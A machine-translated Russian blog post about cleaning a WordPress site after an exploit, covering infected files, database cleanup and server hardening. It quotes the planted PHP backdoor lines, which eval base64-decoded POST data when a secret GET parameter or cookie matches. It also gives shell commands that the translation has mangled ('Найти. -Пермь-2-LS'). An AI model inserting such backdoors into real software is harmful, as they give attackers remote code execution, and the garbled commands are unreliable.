WordPress Эксплойт - Очистите вирусные файлы, SQL и безопасность сервера.

Прежде, чем Вы читаете это сообщение, вы должны увидеть разместить здесь, Чтобы что-то понять. :)

Я нашел его в нескольких файлах блога на stealthsettings.com, коды, подобные приведенным ниже, которые появились в результате заражения вирусом подвиг WordPress.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); Выход; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); Выход; }?>

XMLRPCЕсли она выше файл xmlrpc.php от СонныйНо в GREP сервер, вы можете видеть, что есть довольно много такого рода в исходном коде.

pppffiuuu

Лечение зараженных файлов:

Ooookkkk ...
1. Лучшее решение, после того, как было резервная копияИ очищать базу данных, чтобы вытирать Файлы WordPress (вы можете сохранить wp-config.php и файлы, которые не имеют прямого отношения к платформе wp, после их тщательной проверки) с сервера и загрузить оригинальные из версии 2.5.1 (В течение этого сделать WP обновления версии :)) http://wordpress.org/download/ . Протрите включая файлы темы, если вы не уверены, что их тщательной проверки.

Кажется, были затронуты и файлы темы, которые не были использованы, прежде чем на блоге и просто меняя тему, не решает проблемы.

./андреа/wp-контент/темы/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); Выход; }?>

2. Поиск и удаление всех файлов, содержащих: * _new.php, _old.php *, * Jpgg, Giff *, * Pngg и файл WP-info.txt, если таковые имеются....

найти. -name «* _new.php»
найти. -name «* _old.php»
найти. -name «* .jpgg»
найти. -name «* _giff»
найти. -name «* _pngg»
найти. -name «wp-info.txt»

3. в / Tmp , Поиск и удаление папок, как tmpYwbzT2

SQL очистки :

1. В таблице Таблица wp_options Смотрите, если есть удалите строки: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Все в wp_options, идти к active_plugins и удалять, если есть плагин, который заканчивается в одном из расширений * _new.php, _old.php *, *. jpgg, *. Гифф, *. pngg или если другое расширение подозреваемых, тщательно проверить.

3. В Таблице wp_users, Смотрите, если есть пользователь, который ничего не написал в своем праве, колонка user_nicename. Удалите этого пользователя, но запомните номер в столбце ID. Этот пользователь, скорее всего, будет использовать "WordPress”Ка user_login и, кажется, созданных на 00: 00: 00 0000-00-00.

4. Перейти к таблице wp_usermeta и удалить все линии, принадлежащие ID выше.

После того, как вы выполнили эту очистку sql, отключите, а затем активируйте любой плагин. (в блоге -> Личный кабинет -> Плагины)

Безопасный сервер:

1. Посмотрите, что каталоги и файлы "записи»(Chmod 777) и попытаться положить на них CHMOD , что не позволяет их написания на любом уровне. (644 CHMOD, например)

Найти. -Пермь-2-LS

2. Посмотрите, что файлы имеют бит SUID или SGID . Если вы не используете эти файлы положить на них CHMOD 0 или удалить пакет, который она содержит. Очень опасны, потому что они выполняют привилегии "группы"Или"корень"И не с нормальными пользовательскими привилегиями для выполнения этого файла.

Найти / типа F-Пермь-04000-LS
Найти / типа F-Пермь-02000-LS

3. Проверьте, какие порты открыты и попытаться закрыть или защитить тех, которые не используются.

NetStat-| Grep-я слушаю

О его. Понимаю Некоторые блоги запрещены Google Search и др. сказать: "Ну что вы сделали!». Ну хорошо вы сделали ... но что делать, если Google начнет запретить Все сайты формирование  Является спамом и положить трояны (Trojan.Clicker.HTML) в куки?

Stealth

Увлечен технологиями, мне нравится тестировать и писать руководства по операционным системам. macOS, Linux, Windowsо WordPress, WooCommerce и настроить веб-серверы LEMP (Linux, NGINX, MySQL и PHP). я пишу на StealthSettings.com с 2006 года, а несколько лет спустя я начал писать на iHowTo.Tips обучающие программы и новости об устройствах в экосистеме. Apple: iPhone, айпад, Apple Часы, HomePod, iMac, MacBook, AirPods и аксессуары.

Оставьте комментарий

Ваш электронный адрес не будет опубликован.

Статьи по теме

/ / / / /
Теги: / / / / / / / / /
Вернуться к началу кнопки